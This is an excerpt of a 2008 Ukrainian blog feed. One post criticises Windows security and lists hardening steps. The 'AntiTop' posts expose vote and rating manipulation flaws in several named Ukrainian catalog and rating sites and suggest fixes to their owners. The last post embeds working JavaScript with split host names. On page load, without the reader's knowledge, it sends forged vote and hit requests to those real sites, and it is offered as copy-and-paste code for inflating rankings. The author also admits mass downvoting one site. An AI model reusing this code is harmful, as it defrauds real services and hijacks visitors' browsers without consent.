<li><a href="#-4">Складність розуміння структури системи</a></li>
<li><a href="#-5">Доступ заборонено</a></li>
</ol>
</li>
<li><a href="#-6">Аналіз безпеки</a>
<ol>
<li><a href="#-7">Як можна навчитись створювати автозавантаження з якогось диска, що Ви записуєте?</a></li>
<li><a href="#nbsp">&nbsp;Як можна проаналізувати зміни в системі?</a></li>
<li><a href="#-8">Як можна відкотити зміни в системі?</a>
<ol>
<li><a href="#-9">Незручно</a></li>
<li><a href="#-10">Дорого</a></li>
<li><a href="#-11">Потрібно</a></li>
</ol>
</li>
</ol>
</li>
<li><a href="#-12">Кроки</a></li>
</ol>

</ol>
</div>
</div>
<div lang="uk-UA">
<h2 id="">Ліричний вступ</h2>
</div>
<div>Не люблю я <i><b>windows</b></i> <br /><br />
  Знаю, дана система - переважаюча на ринку... І для бізнесу в ній створено всі можливі програмні продукти. І підтримка драйверів реалізована непогано, і знає її на банальному користувацькому рівні кожна собака. <br /><br />
  Але не зважаючи на це - психологія роботи, відношення до користувача, а головне - наявність вірусів, та найнижчий серед усіх операційних систем рівень безпеки. І з цим я не можу миритись.<br /><br />
  І про боротьбу з вірусами та частково безпеку я спробую сьогодні сказати кілька слів.<br /><br />
</div></p>
<h4 id="-1">Що таке вінда?</h4>
<p>Відповідь буде лише про недоліки. Нічого не можу з цим зробити, але переваг у вінди залишилось дуже мало, які можуть реально протистояти всім її недолікам.<br /><br />
  На статтю мене &quot;надихнула&quot; недавня епопея боротьби з вірусами на моїй робочій станції.<br /><br />
  І все би було добре, якщо б поряд не стояло дві робочих станції та сервера на &quot;інородних&quot; операційних системах(про них я не буду говорити). Скажу лише, що вони виконують аналогічну роботу, як і вінда - кількість файлів та різноманітних пристроїв, що проходять через них - аналогічна, але з безпекою проблем немає.<br /><br />
А вінда:</p>
<ul>
<li>встановлений ліцензійний хороший антивірус</li>
<li>постійно стягуються та встановлюються останні сервіс-паки</li>
<li>не запускається жодних лівих інтернет програм</li>
<li>також не використовується  Internet Explorer</li>
</ul>
<p>І толку мало.<br /><br />
  <i><b>Є нюанс</b></i>, з яким постійно зустрічається щодня дана робоча станція - в неї &quot;вставляються&quot; від 20-ти FLASH накопичувачів в день, які приносять замовники.<br /><br />
  І що тільки не робилося - толку 0 - віруси лізуть і все тут. І саме головне - працюючи не від імені адміністратора, система заражається всерівно і заражається також і адміністративний профіль.<br /><br />
</p>
<ul>
<li>Поганий антивірус? Сумніваюсь - перепробували велику кількість як легальних так і не зовсім варіантів - без толку!</li>
<li>Погані користувачі? Також сумніваюсь - проблеми не тільки на моїй робочій станції.</li>
<li><i><b>Погана система</b></i>? Погоджусь!</li>
</ul>
<div class="rteindent1">За більш як 8 років сервісно-адміністративної роботи в мене з'явилась певна теоретична та практична база знань та фактів, якими варто поділитись з іншими. Були в мене випадки, коли приходилось відновлювати системи &quot;по телефону&quot;, мав практику знезараження серверів, які заборонено було вимикати та перевантажувати, доводилось відловлювати троянів та вірусів віддаленого адміністрування, які при вимиканні компа від мережі генерували синій екран смерті...</div>
<hr />

<h2 id="-2">Проблеми безпеки</h2>

<div>
<h3 id="-3">Параметри за замовчуванням</h3>
</div>
<div>В системі windows існує величезна проблема - система безпеки налагоджена в стандарті дуже погано і не створено жодних можливостей для забезпечення на користувачькому рівні рішень від небажаних програм та дій. Крім того важлива частина системи - реєстр - проініціалізований загальносистемно так, що будь-який користувач, навіть гість може певними засобами завалити систему. або внести в неї певні параметри, які забезпечать можливість запуску небажаних програм або скриптів під час завантаження користувача з підвищеними привілеями. Це стосується профіля Allusers.<br /><br />
  Окремим пунктом є &quot;<b>автоматизм</b>&quot;, який МС вважає &quot;<b>зручним</b>&quot;. Ідея звичайно хороша - при вмиканні нового пристрою - запустити пов'язаний їз цим алгоримт. Але це добре для накопичувачів, в яких рівень довіри наближається до 100 відсотків. <br /><br />
  А як бути в випадку, якщо це розповсюджений флеш-накопичувач, зовнішній диск, або навіть підмонтований мережево розшарений ресурс?<br /><br />
  Вимкнути автозапуск? Правильно! Але як це зробити звичайному користувачу? В системі ХР(Віста) навіть нормального інструменту для цього немає.</div>
<div>
<h3 id="-4">Складність розуміння структури системи</h3>
<div>Чи багато з користувачів розуміє яким чином система обробляє скажімо запуск exe файла? Або навіть такий, на перший погляд безневинний процес, як процес запуску пов'язаної програми для перегляду банального текстового документа? Або як обробляється скажімо натискання на певному об'єкті в системі правої кнопки миші?</div>
<div>Все це реалізовано у даній ОС через велику та складну систему класів в реєстрі! І складністю цією користуються ті, хто пишуть віруси та трояни.&nbsp;<br /><br />
  Скажімо клікаєте ви на файл з розширенням *.doc - система перечитує реєстр, викликає відповідно назначену для цього програму або клас, з яким пов'язана певна функція виклику в деякому dll компоненті...<br /><br />
  Складно? Так! І найгірше, що процес цей зовсім не захищений. Тобто будь-який ламер може змінити процедуру обробки такого кліка.<br /><br />
  А тепер подумайте про такі виклики як</div>
<ul>
<li>меню правої кнопки миші(в кожній з програм)</li>
<li>інсталяція програм</li>
<li>одноразовий виклик певних команд при перезавантаженні</li>
<li>неймовірна кількість місць в реєстрі, звідки можна зробити виклик програми без відома користувача</li>
<li>білі та чорні списки вебсайтів, яким довіряє користувач і яким недовіряє. Додати туди щось не складає проблеми.</li>
</ul>
<p>І це ще не все.</p>
<h3 id="-5">Доступ заборонено</h3>
<p>Думаю кожен користувач вінди час від часу отримував таке повідомлення. Чесно кажучи я взагалі не пригадую випадків, коли таке повідомлення виникало в справжньому випадку, коли заборона була потрібна(ну я не рахую тих випадків, які були викликані параметрами системи, заданими мною). В оносновному таке повідомлення виникало в випадку необхідності доступу до мережевого ресурсу на сусідній машині, або при необхідності інсталяції певного програмного забезпечення, яке вимагало адміністративних привілей і в даний момент існталяція відбувалась під профілем неадміністративного користувача в режимі Run as...(Запуск від імені іншого користувача).<br /><br />
  А знаєте, як обобляють таке повідомлення &quot;інші&quot; ОС?<br /><br />
</p>
<div class="rtecenter">&nbsp;</div>
<div class="rtecenter"><a href="http://my.ukrweb.info/macos#"><img alt="Вікно, що виникає кожен раз, якщо існує загроза доступу до важливих системних файлів" width="500" height="389" lang="uk-UA" longdesc="http://my.ukrweb.info/макос" src="http://my.ukrweb.info/files/macos_security.png" /></a></div>
<p>Вони виводять на екран вікно вводу логіна та пароля користувача, який має права. <b>Зручно</b>? <b><span style="color: rgb(255, 102, 0); ">Так</span></b>! <b>Безпечно</b>? <span style="background-color: rgb(255, 102, 0); ">Так</span>! А от чому саме безпечно? - Домашнє завдання Вам 8))))))).</p>
<h2 id="-6">Аналіз безпеки</h2>
<div>Для вивчення питання безпеки є два методи - аналізування змін в системі та вивчення варіантів взлому.</div>
<div>Спірне питання який варіант є кращим... НМД - другий. Бо вірусологія - це ключ до розуміння принципів роботи на всіх рівнях.</div>
<p>Спробую навести приклад</p>
<h3 id="-7">Як можна навчитись створювати автозавантаження з якогось диска, що Ви записуєте?</h3>
<p><b>В документації до Вінди</b> про це мало що написано - більше в MSDN, який коштує великих грошей, або на сайті майкрософта, де частково це можна почитати(із великою кількістю помилок та застарілої інформації). Можуть в цьому допомогти також і спеціальні програми(стороннього виробника і не завжди безкоштовні), в яких може бути присутній певний варіант інтерфейсу до функцій автозавантаження, які надає вінда.<br /><br />
  <b>В прикладах</b>, які описані на різноманітних вебсайтах - метод дуже хороший, але не завжди універсальний<br /><br />
  <b>В вірусології</b>, де точно можна знайти найрізноманітніші методики автоматичного запуску, які точно працюють!<br />
<blockquote>Класно, правда? Я описуюю тут технології вірусів, які мають перевагу над офіційною документацією розробників ОС.&nbsp;</blockquote></p>
<h3 id="nbsp">&nbsp;Як можна проаналізувати зміни в системі?</h3>
<p>Приклад. Встановили Ви якусь програму, що понастворювала в системі величезну кількість перехоплень викликів по правій кнопці мишки, додала колосальну функціональність до ОС зручними фічами, понастворювала велику кількість файлів, позакидала в автозавантаження себе і свої компоненти, пододавала велику кількість служб та драйверів тощо. Як все це побачити? Реально ж повзунок інсталяції дуже малоінформативний! Для цього в системі вінди немає user-friendly інструментів. А ті, що є - вимагають значних знань, на рівні адміністрування великих серверів windows. Я спробую показати на прикладі Microsoft management Console яким чином легком'які пропонують робити аналіз вже зроблених змін в системі(замість того, щоб не допустити цих змін).</p>
<h3 id="-8">Як можна відкотити зміни в системі?</h3>
<p>Загалом в випадку вінди це або незручно, або дорого. Про один з методів відновлення роботоздатності вінди я писав раніше - <a href="http://my.ukrweb.info/vidnovlennya-robotozdatnosti-windows-nt-2000-xp-vista#">Відновлення роботоздатності Windows</a>.</p>
<h4 id="-9">Незручно</h4>
<p>Незручно тим, що система сама не надає нормальних засобів для резервування даних на рівні користувача. Все, що є - це пафос. Хоча в прямих руках можна користуватись і цим. Крім того самі ці засоби створені коряво, і ними досить часто користуються віруси для внесення змін в систему.</p>
<h4 id="-10">Дорого</h4>
<p>Для резервного копіювання потрібно мати подвійну ємність накопичувачів. А це прямі витрати. Хоча мабуть вінда - це єдина система, в випадку використання якої резервне копіювання насправді вигідне. Як мінімум економією часу.<br /><br />
</p>
<h4 id="-11">Потрібно</h4>
<p>І навіть дуже! В випадках, коли Ваша система для повної переінсталяції вимагає часу в районі тижня-місяця. Крім того врахуйте, що не всі віруси залишають цілісність Ваших даних. А зруйновані дані ніяка переінсталяція не відновить.<br /><br />
  Хоча в більшості випадків достатньо зберігати копію найважливіших системних параметрів, з якими реально завантажитись на певному етапі.</p>
<h2 id="-12">Кроки</h2>
<ul>
<li>Вимикаємо всі можливі автоматичні процеси в системі</li>
<li>Змінюєм параметри реєстру з максимально можливим захистом</li>
<li>Налагоджуєм права доступу до певних гілок реєстру</li>
<li>Робим резервну копію головних параметрів</li>
<li>Налагоджуєм політики безпеки</li>
<li>Налагоджуєм права доступу до важливих файлів на файловій системі(NTFS)</li>
<li>З допомогою MMC робимо збереження налагоджених параметрів для аналізу в майбутньому</li>
</ul>
<p>Але про ці кроки - в майбутніх статтях</p></div>
    ]]></content>
  </entry>
  <entry>
    <title>Antitop v0.2 beta</title>
    <link rel="alternate" type="text/html" href="http://my.ukrweb.info/2008/03/5/antitop-v02-beta" />
    <id>http://my.ukrweb.info/2008/03/5/antitop-v02-beta</id>
    <published>2008-03-14T17:57:34+02:00</published>
    <updated>2008-08-30T01:36:53+03:00</updated>
    <author>
      <name>podarok</name>
    </author>
    <category term="antitop" />
    <category term="ua" />
    <category term="webmaster" />
    <category term="безпека" />
    <category term="вебмайстер" />
    <category term="патч" />
    <category term="спам" />
    <summary type="html"><![CDATA[<div lang="uk-UA">Голосування в інтернеті - важлива частина і в багатьох випадках - головний фактор формування вебпроектів. Але для коректності - необхідно піклуватись про безпеку, особливо в випадках, коли в голосуваннях приймають участь анонімні користувачі.<br/><br />
Сьогодні в проекті антитоп - вебсайт <a href="http://ukrbash.org" title="http://ukrbash.org">http://ukrbash.org</a><br />
</br/></div>
    ]]></summary>
    <content type="html"><![CDATA[<div lang="uk-UA">Голосування в інтернеті - важлива частина і в багатьох випадках - головний фактор формування вебпроектів. Але для коректності - необхідно піклуватись про безпеку, особливо в випадках, коли в голосуваннях приймають участь анонімні користувачі.<br/><br />
Сьогодні в проекті антитоп - вебсайт <a href="http://ukrbash.org" title="http://ukrbash.org">http://ukrbash.org</a>
</br/></div>
<p>&lt;!--break--><br />
<div class="toc">
<div class="toc-title">Меню 8) сторінки [<a href="#" class="toc-toggle">hide</a>]</div>
<div class="toc-list">
<ol>
<ol>
<li><a href="#Disclaimer">Disclaimer</a></li>
<li><a href="#-1">Спочатку трошки прелюдії.</a></li>
<li><a href="#quotquot">&quot;Людія&quot;</a></li>
<li><a href="#-2">Рекомендації</a></li>
</ol>

<li><a href="#-3">Висновок</a>
<ol>
<li><a href="#PS">PS</a></li>
</ol>
</li>
</ol>
</div>
</div>
</p><p> <br/>ukrbash.org - національний цитатник. Мова буде йти про нього.</br/></p>
<h2 id="">Вітання!</h2>
<p>Сьогодні позачерговий випуск проекту AntiTop, і пишу я його по причині великої ефективності коду, який був розміщений в інтернеті завдяки мені та моєму партнеру.<br /><br />
Отже, невеликий графік.<br /><br />
<center></center></p>
<div class="rtecenter"><a target="_blank" href="http://ukrbash.org"><img alt="ukrbash.org moon" align="middle" lang="uk-UA" longdesc="http://my.ukrweb.info/antitop" width="600" height="491" src="http://my.ukrweb.info/files/ukrbash_moon.png" /><br /><br />
   <br type="_moz" /><br />
   </a></div>
<p>Після спілкування з модератором даного проекту - &quot;на сайт відбувалась ДДОС атака&quot;.<br /><br />
    Загалом - погоджуся. Хоч і реальною атакою це назвати важко - швидше &quot;дружня атакочка&quot;.</p>
<h2 id="Disclaimer">Disclaimer</h2>
<p>Процедура, обрана для даної події повністю зворотня і робилась після переконання наявності резервної копії. Крім того - в мене є збережені всі дані та статистика &quot;накрутки&quot;. Крім того - my.ukrweb.info - постійний читач УкрБашу і даною дією намагається зробити його кращим!<br /><br />
 <br /><br />
</p>
<h2 id="-1">Спочатку трошки прелюдії.</h2>
<p>Реалізація голосування - дуже ефективна та важлива частина більшості web2.0 проектів. Вони формуються на основі таких голосувань. Вся їхня структура та суть побудована на голосуваннях та фідбеках. Отже в такому випадку важливим фактором є безпека, бо посягання на голосування можуть повернути проект зовсім в протилежний бік. Скажімо конкурент, для підняття рейтингу свого проекту може завідомо завалити Ваш, опустивши в 0 найцікавіші частини.<br /><br />
   На графіку відображено приклад &quot;тупої&quot; накрутки личільників всіх статей з ТОРу. В результаті на арену виходять &quot;нецікаві&quot; низькорейтингові статті, які підсвідомо можуть сформувати в користувачів проекту негативне враження.<br /><br />
   <br /><br />
   Нажаль, на момент публікації статті помилка невиправлена, тому код, який спричиняє таку &quot;бідосю&quot; я опублікую лише після реального &quot;налагодження&quot; роботи.<br /><br />
</p>
<h2 id="quotquot">&quot;Людія&quot;</h2>
<p>На протязі 6 годин різноманітні ІР адреси голосували в мінус статті з ТОРу УкрБаша. Нажаль захисту від цього практично не існує, але захист від &quot;дурня&quot; - життєво необхідний, і реалізація цього захисту - за ukrbash.org. Тестування захисту за my.ukrweb.info - завжди допоможемо в цьому.<br /><br />
</p>
<h2 id="-2">Рекомендації</h2>
<ol>
<li>Контроль частоти голосувань - обмежити зверху і привязати обмеження до одного ІР</li>
<li>Додати перевірку referrer в момент голосування</li>
<li>Віддачу голоса анонімним користувачем ускладнити додатковим кроком, залежним від випадкових чисел, але мінімально ненавязаним ускладненнями</li>
<li>Реалізувати обробку результатів голосування не одразу, а з невеликою затримкою - скажімо раз в добу, або раз в кілька годин - тоді зміни на вебсайті можна зафіксувати більш чітко і незамітно для користувачів</li>
<li>Ускладнити метод голосування, <b>переробивши його не через GET, а через POST</b></li>
</ol>
<h1 id="-3">Висновок</h1>
<p>Безпека - це важливо!&nbsp;<br /><br />
 І вивчення сторони взлому - це перший крок до розуміння самої безпеки.<br /><br />
 <br /><br />
 Успіху Вам!<br /><br />
</p>
<h2 id="PS">PS</h2>
<p>Проект перейшов із стадії альфа в стадію бета.<br /><br />
Для наступних тем сподіваюсь на Ваші пропозиції.<br /><br />
<br type="_moz" /><br />
</p>
    ]]></content>
  </entry>
  <entry>
    <title>Antitop версія 0.1 (альфа)</title>
    <link rel="alternate" type="text/html" href="http://my.ukrweb.info/2008/03/5/antitop-%D0%B2%D0%B5%D1%80%D1%81%D1%96%D1%8F-01-%D0%B0%D0%BB%D1%8C%D1%84%D0%B0" />
    <id>http://my.ukrweb.info/2008/03/5/antitop-%D0%B2%D0%B5%D1%80%D1%81%D1%96%D1%8F-01-%D0%B0%D0%BB%D1%8C%D1%84%D0%B0</id>
    <published>2008-03-07T00:28:39+02:00</published>
    <updated>2008-06-12T03:48:23+03:00</updated>
    <author>
      <name>podarok</name>
    </author>
    <category term="antitop" />
    <category term="catalog" />
    <category term="html" />
    <category term="IT" />
    <category term="seo" />
    <category term="ua" />
    <category term="ukrweb" />
    <category term="webmaster" />
    <category term="безпека" />
    <category term="вебдизайн" />
    <category term="вебмайстер" />
    <category term="спам" />
    <summary type="html"><![CDATA[<div lang="uk-UA">
Довго вагався чи розпочинати дану серію статей... <br/><br />
Радився з hip та jarofed, та ще з одним партнером.... <br />
І вирішили, що дана серія, при коректному використанні буде корисною для вебсайтів в цілому.
<p>Отже - Рейтинги... Каталоги, Топи, міряння довжиною органів... І тому подібна лабуда...<br/><br />
Загалом - це не лабуда. Аналізувати рейтинговість - це важлива частина будь-якого процесу з багатьма учасниками, а інтернет - саме такий процес. <br/><br />
От тільки аналіз повинен бути якщо не ідеальним, то хоча б наближеним до реальності.<br/></br/></br/></br/></p>
<p></p></br/></div>
    ]]></summary>
    <content type="html"><![CDATA[<div lang="uk-UA">
Довго вагався чи розпочинати дану серію статей... <br/><br />
Радився з hip та jarofed, та ще з одним партнером.... <br />
І вирішили, що дана серія, при коректному використанні буде корисною для вебсайтів в цілому.
<p>Отже - Рейтинги... Каталоги, Топи, міряння довжиною органів... І тому подібна лабуда...<br/><br />
Загалом - це не лабуда. Аналізувати рейтинговість - це важлива частина будь-якого процесу з багатьма учасниками, а інтернет - саме такий процес. <br/><br />
От тільки аналіз повинен бути якщо не ідеальним, то хоча б наближеним до реальності.<br/><br />
З Ваших відгуків буду визначати, чи варто продовжувати аналіз в даному напрямку, а також для "жертв" даного циклу можу запропонувати реальну допомогу в тестуванні та виправленні виявлених помилок.<br/><br />
Коротка преамбула закінчилась...<br/><br />
Сьогодні я буду розповідати про три, нещодавно потрапивших мені під руку каталоги, що мають невелике відношення до Українського інтернету.<br/>
</br/></br/></br/></br/></br/></br/></p></br/></div>
<div class="toc">
<div class="toc-title">Меню 8) сторінки [<a href="#" class="toc-toggle">hide</a>]</div>
<div class="toc-list">
<ol>
<li><a href="#-1">Відмова від відповідальності</a></li>
<li><a href="#topblognetua">top.blog.net.ua</a>
<ol>
<li><a href="#exploit">Проблема в вигляді exploit</a></li>
<li><a href="#-2">Логіка проблеми</a></li>
<li><a href="#-3">І сама проблема</a></li>
<li><a href="#topblognetua-1">Побажання власнику top.blog.net.ua</a></li>
</ol>
</li>
<li><a href="#blogmirnet">blogmir.net</a>
<ol>
<li><a href="#exploit-1">Проблема exploit</a></li>
<li><a href="#-4">Побажання власнику</a></li>
</ol>
</li>
<li><a href="#wwwcatalg2coua">www.catalоg2.co.ua</a>
<ol>
<li><a href="#ExploitDIGG">Exploit ака антиDIGG</a></li>
<li><a href="#-5">Побажання власнику</a></li>
</ol>
</li>
<li><a href="#-6">Висновки</a>
<ol>
<li><a href="#PS">PS</a></li>
</ol>
</li>
</ol>
</div>
</div>
<hr />
<p>Мої вітання...</p>
<h1 id="">Преамбула</h1>
<p>Довго вагався чи розпочинати дану серію статей... <br/><br />
Радився з hip та jarofed, та ще з одним партнером.... <br />
І вирішили, що дана серія, при коректному використанні буде корисною для вебсайтів в цілому.</br/></p>
<p>Отже - Рейтинги... Каталоги, Топи, міряння довжиною органів... І тому подібна лабуда...<br/><br />
Загалом - це не лабуда. Аналізувати рейтинговість - це важлива частина будь-якого процесу з багатьма учасниками, а інтернет - саме такий процес. <br/><br />
От тільки аналіз повинен бути якщо не ідеальним, то хоча б наближеним до реальності.<br/><br />
З Ваших відгуків буду визначати, чи варто продовжувати аналіз в даному напрямку, а також для "жертв" даного циклу можу запропонувати реальну допомогу в тестуванні та виправленні виявлених помилок.<br/><br />
Коротка преамбула закінчилась...<br/><br />
Сьогодні я буду розповідати про три, нещодавно потрапивших мені під руку каталоги, що мають невелике відношення до Українського інтернету.<br/></br/></br/></br/></br/></br/></br/></p>
<h1 id="-1">Відмова від відповідальності</h1>
<p><br/><br />
Я жодним чином не намагаюсь нашкодити цим трьом(і можливо всім наступним) проектам. Навпаки! <br/><br />
Коректне ведення статистики буде відображати більш-менш правильну рейтинговість і дозволить робити +- вірну оцінку сайтам.<br/> Всі коди, що використані в даній статті приховані від очей і їх можна переглянути в сорцях цієї сторінки.<br/><br />
Якщо дана сторінка буде некоректно відображатись - значить власники відповідних сайтів зробили деякі зміни - не лякайтесь - найближчим часом я все поправлю. Можете посприяти мені, підказавши проблему.<br/></br/></br/></br/></br/></br/></p>
<h1 id="topblognetua">top.blog.net.ua</h1>
<p><br/><br />
Даний php скрипт - дуже і дуже популярний в інтернеті. І в світлі знайдених в ньому багів - всі рейтинги, що побудовані на базі нього - <b>некоректні</b>.<br />
Одназу прошу пробачення за наступний блок.<br/></br/></br/></p>
<h2 id="exploit">Проблема в вигляді exploit</h2>
<p>Одразу прошу пробачення за завідомо збій в роботі каталогу. Моя мета - вказана вище. <br/><br />
Нагадую - код в сорцях вебсторінки і в даний момент Ви його виконали 8).(на екрані - результат виконання коду)<br/></br/></br/></p>
<p>&lt;!-- Початок коду, для вставки на своєму вебсайті--></p>
<div align="center" width="640" height="92">
<script language=JavaScript type=text/javascript>
document.write('<a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=499 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=530 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=475 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=503 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=520 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=462 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=532 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=534 /></a><br/><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=465 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=463 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=464 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=456 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=468 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=515 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=485 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=529 /></a><br/><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=493 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=484 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=498 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=504 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=480 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=531 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=489 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=518 /></a><br/><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=510 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=476 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=479 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=487 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=458 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=87 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=103 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=75 /></a><br/><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=79 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=104 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=74 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=90 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=72 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=110 /></a><a target=_blank href=# rel=nofollow><img src=http://top.'+'blo'+'g.net.ua/tracker.php?do=in&id=486 /></a><br/>');
</br/></br/></br/></br/></br/></script></div>
<p>&lt;!--Кінець коду вставки, код не хватають пошуковики!!! --></p>
<p><br/><br />
В цьому блоці, банальний набір коду, який пропонується вставляти кожному користувачеві, що приймає участь в рейтингу. Код частково змінений, для того, щоб його не хватали пошуковики. Для даної статті було обрано сорок блогів, які знаходяться на останній сторінках каталогу - щоб не дуже сильно портити картину для майбутньої роботи даного сервісу.<br/></br/></br/></p>
<h2 id="-2">Логіка проблеми</h2>
<p>Як тільки користувач будь-якого вебсайту, на якому встановлений лічильник заходить на сторінку, де цей лічильник заходиться - автоматично додається +1 до рейтингу вебсайта (в конкретно даному випадку - блога). І все було б добре, але якщо розмістити цей лічильник на іншому вебсайті - кожен з користувачів іншого вебсайту також буде робити +1 до рейтингу...</p>
<h2 id="-3">І сама проблема</h2>
<p>Не перевіряється referrer , з якого відбулось завантаження лічильника. <br/><br />
Ну і що? - скажете Ви.. Кому вигідно вішати чужий лічильник на своєму сайті...<br/><br />
Відповідь - власнику свого ж вебсайта...<br/><br />
Наскільки мені відомо - багато блогерів ведуть по кілька щоденників, роблять кроспостінг в інші відомі блогерські портали, роблять коментарі з допомогою HTML.<br/><br />
Якщо взяти це до уваги - тоді можна робити відповіді в тому ж ЖЖ, і до кожної відповіді вішати свій лічильник, або набір лічильників(приховавши їх в квадратику розміром 1х1 піксель). В результаті рейтинг буде некоректним.<br/></br/></br/></br/></br/></br/></p>
<blockquote><p>Всі блоги, що вішають даний лічильник на своїх ЖЖ - мають конкретно завищений показник, особливо ті, що додані до friend-полос - тоді дуже багато учасників, навіть не читаючи такі повідомлення, - "віддають свій голос" за блог, повідомлення якого вони пропускають</p></blockquote>
<p><br/><br />
Ве було б нічого, але на базі цього рейтингу інші учасники роблять помилкові висновки ( jarofed підтвердить )<br/></br/></br/></p>
<h2 id="topblognetua-1">Побажання власнику top.blog.net.ua</h2>
<p>Додати в код підрахунку хітів та хостів перевірку referrer - там роботи на 2-3 стрічки php коду.<br/></br/></p>
<h1 id="blogmirnet">blogmir.net</h1>
<p>Досить відомий каталог. І функціональність його - на висоті! Дуже часто користуюсь ним для швидкого аналізу pr+technorati. <br/><br />
Більше того, власник в мене взяв інтерв'ю 8))). Керуючись помилковими даними, які я йому підсунув. На жаль - таке життя. <br/><br />
Отже - позиція Вашого блогу напряму залежить від кількості голосів, відданих за Вас. <br/><br />
Поки з каталога переходів на блоги дуже мало - є шанс все поправити.</br/></br/></br/></p>
<h2 id="exploit-1">Проблема exploit</h2>
<p>Накрутка даного голосування - дуже елементарна і також без перевірок та захистів.<br/><br />
Голосування відбувається методами Ajax - банальний GET запит без додаткових перевірок.<br/><br />
Нагадую - код в сорцях вебсторінки і в даний момент Ви його виконали 8).(на екрані - результат виконання коду)<br/><br />
&lt;!--Код для вставки в себе на вебсайті для накрутки лічильника голосів на blogmir.net--></br/></br/></br/></p>
<div align="center" width="640" height="5">
<script language=JavaScript type=text/javascript>
document.write('<object data=http://blog'+'mir.net/toprank.php?lid=3215&vote=plus&_=>http://blog'+'mir.net/from.php?3215</object>');
</script></div>
<p>&lt;!--Кінець коду blogmir.net--></p>
<p>Замість цифри 3215 - вставляєте код будь-якого інснуючого в каталозі, і всі Ваші користувачі "проголосують" за відповідний блог.<br/></br/></p>
<h2 id="-4">Побажання власнику</h2>
<p>Потрібна мабуть або якась мінімальна Captcha, або - javascript event вікно з підтвердженням про голос - тоді шанси накрутити - набагато менші.<br/></br/></p>
<h1 id="wwwcatalg2coua">www.catalоg2.co.ua</h1>
<p>Заявлена вебдванольність - також недосконала. </p>
<h2 id="ExploitDIGG">Exploit ака антиDIGG</h2>
<p>Накрутка також здійснюється елементарно засобами користувачів на будь-якому html вебсайті<br/><br />
Нагадую - код в сорцях вебсторінки і в даний момент Ви його виконали 8).(на екрані - результат виконання коду)<br/></br/></br/></p>
<p>&lt;!--Код для вставки на своєму вебсайті для catalog2.co.ua--></p>
<div align="center" width="640" height="5">
<script language=JavaScript type=text/javascript>
document.write('<object data="http://www.cata'+'log2.co.ua/ch.php?id=50" charset="windows-1251" encoding="windows-1251" lang="ru-RU">.</object>');
</script></div>
<p>&lt;!--Кінець коду--></p>
<p>Замінивши цифру 50 порядковим номером Вашого улюбленого сайту - можна за кілька днів просунути сайт в ТОР.<br/></br/></p>
<h2 id="-5">Побажання власнику</h2>
<p>Загалом - принцип взлому - аналогічний до </p>
<script language=JavaScript type=text/javascript>
document.write('blog'+'mir.net');</script><p>  , тому рекомендації будуть аналогічні.<br/></br/></p>
